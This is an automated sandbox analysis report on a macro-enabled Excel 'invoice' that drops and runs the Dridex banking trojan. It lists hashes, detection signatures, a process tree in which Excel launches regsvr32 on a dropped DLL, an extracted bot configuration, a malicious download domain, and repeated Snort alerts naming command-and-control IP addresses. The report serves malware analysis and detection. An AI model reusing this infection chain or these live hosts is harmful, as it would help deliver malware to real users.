Loading ...

Play interactive tourEdit tour

Analysis Report INV3867196801-20210111675616.xlsm

Overview

General Information

Sample Name:INV3867196801-20210111675616.xlsm
Analysis ID:338155
MD5:9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1:6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256:a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2352 cmdline: -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2412 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2440 cmdline: C:\Windows\system32\dwwin.exe -x -s 2360 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.270000.1.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\jczxic.dllReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted fileShow sources
Source: INV3867196801-20210111675616.xlsmVirustotal: Detection: 33%Perma Link
Source: INV3867196801-20210111675616.xlsmReversingLabs: Detection: 32%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\jczxic.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zipJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002DCEF8 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\jczxic.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: d4bfa7nne[1].zip.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: www5.ritamartins.pt
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.2.4.104:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.2.4.104:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49168
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49169
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49172
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49180
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49184
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49208
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49216
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
